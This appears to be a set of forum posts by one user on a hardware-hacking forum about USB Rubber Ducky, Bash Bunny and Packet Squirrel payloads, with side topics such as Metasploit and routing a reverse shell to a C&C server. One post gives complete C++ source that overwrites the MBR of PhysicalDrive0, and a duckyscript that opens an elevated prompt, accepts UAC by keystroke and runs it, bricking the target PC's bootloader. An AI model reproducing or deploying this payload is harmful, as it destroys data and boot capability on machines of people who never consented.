  1. How about using Domain Fronting? You can connect your C&C server to a VPN with port forwarding and then let the shell connect to that port on the VPN side, which will then be forwarded to your C&C... in theory.
  2. be quiet! Silent Base 800 Black, No Window; ASUS Prime X370-Pro; AMD Ryzen 7 1700X; 2x8GB Vengeance DDR4-3200; be quiet! Silent Loop 120mm; MSI GTX 770; Samsung 850 Evo 250GB SSD; 550 Watt Corsair Semi Modular PSU (don't know the actual name rn). Wanted to buy a new GPU for Machine Learning but prices are so damn high...
  3. Yep, when I run it separately on another switch it works fine, but it won't work when using PopsWRT sadly.
  4. Everything works. Except the tcpdump. A folder on the external storage is created but there are no tcpdump logs in there. (normal tcpdump works fine) Logs say that tcpdump has been started and is finished, so I have no idea what could be wrong. (and yes, I switched it to bridge before trying that).
  5. Woah, that's dope. Will test as many features as I can and will report back ;) @Dave-ee Jones have you thought about minifying the bootstrap-iso.css to save a few bytes, since storage is gold on the PS? :D
  6. Did you change the keyboard layout to "es" when compiling the duckyscript?
  7. Reminds me of my PyDuckGen. But seems like your script works ;) (I'll have a look if I can improve your script)
  8. Did you even change something? Don't think so... so check the code and try to get the iptables/tor stuff from it.
  9. For this payload set the netmode to transparent and use the br-lan interface.
  10. There was a discussion about this here:
  11. I described the issue here. The one in the repository, which is the updated version (https://github.com/hak5/packetsquirrel-payloads/tree/master/payloads/library/sniffing/ispyintel), should work fine.
  12. I guess that this is not possible, since no driver is loaded and/or can be installed if you aren't on win/linux/osx.
  13. This is wrong: no quotes and no = are needed, so it should look like this: STRING K0cj0mKMchAAAAAAAAAAC0MHOM6B-qtOB9zszza03NGx21eRsaKiurS
  14. That would be possible if he were using a BashBunny haha :) Since the Ducky is only a HID, this won't work directly on the Ducky.
  15. Wow, that's a nice idea :) Thanks for sharing. I might convert this script to a USB Rubber Ducky (since it's not that hard).
  16. As far as I know the Ducky can't do that on its own. Maybe you can write a bash/batch script to copy a random key/number into your clipboard and start that, and the Ducky just presses CTRL+V to paste that random character?
  17. The Intel ones do work with e.g. GalliumOS (which is Ubuntu + the necessary Chromebook drivers). (use it myself)
  18. I don't get your problem? Session 1 was opened... so just use sessions to list your sessions and interact with them. This is basic Metasploit stuff... maybe you should have a look at Metasploit Minute.
  19. Credits: https://github.com/brainsmoke/nyanmbr (he wrote a freaking bootloader with nyancat.. AMAZING)

I made a payload to overwrite your bootloader with the nyancat bootloader, which will render your PC USELESS.

CAUTION: This will brick your bootloader. DO NOT TRY THIS on your OWN PC. USE A VM.

1. Download the precompiled boot.exe (source code is here if you want to compile yourself):

```cpp
#include <windows.h>
#include <conio.h>
#include <iostream>

int main(int argc, char* argv[]) {
    DWORD dw;
    char *pathToBin = "boot.bin";
    HANDLE drive = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
    if (drive != INVALID_HANDLE_VALUE) {
        HANDLE binary = CreateFile(pathToBin, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0);
        if (binary != INVALID_HANDLE_VALUE) {
            DWORD size = GetFileSize(binary, 0);
            if (size > 0) {
                byte *mbr = new byte[size];
                if (ReadFile(binary, mbr, size, &dw, 0)) {
                    std::cout << "Binary file successfuly read!" << std::endl;
                    if (WriteFile(drive, mbr, size, &dw, 0)) {
                        std::cout << "First sector overritten successfuly!" << std::endl;
                    } else std::cerr << "Fatal error! Can't override 1st sector!" << std::endl;
                } else std::cerr << "Error reading from binary file!" << std::endl;
            } else std::cerr << "Invalid binary file!" << std::endl;
        } else {
            std::cerr << "Can't find the binary file to read from!" << std::endl;
        }
        CloseHandle(binary);
    } else std::cerr << "Administrator privileges required!" << std::endl;
    CloseHandle(drive);
    return 0;
}
```

2. Create the folder exec on your Ducky SD card and copy boot.exe into it.

3. Download the img file from https://github.com/brainsmoke/nyanmbr, rename it to boot.bin and put it in DUCKY\exec\boot.bin

4. Here is the duckyscript (make sure your SD card is labeled DUCKY):

```
REM I am NOT responsible for ANY DAMAGE
REM overwrites bootloader with https://github.com/brainsmoke/nyanmbr
DELAY 5000
ESCAPE
DELAY 500
CONTROL ESCAPE
DELAY 500
STRING cmd
DELAY 500
CTRL-SHIFT ENTER
DELAY 1000
REM replace with desired uac alt + key combo (y for yes in english, j for german etc)
ALT y
DELAY 1500
STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do %a
ENTER
DELAY 300
STRING cd exec
ENTER
DELAY 300
STRING boot.exe
ENTER
DELAY 1000
STRING exit
ENTER
```

I have also added this payload to my PyDuckGen (https://github.com/ThoughtfulDev/PyDuckGen), which makes generating payloads easier.
  20. try encoding in your keyboard layout (default is US)
  21. You can run PowerShell and cmd without admin privs, or am I mistaken? e.g. Ctrl+R and then powershell/cmd.exe will run it without admin privs.
  22. I'm using PIA but have a look at That One Privacy Site. That dude is just awesome!
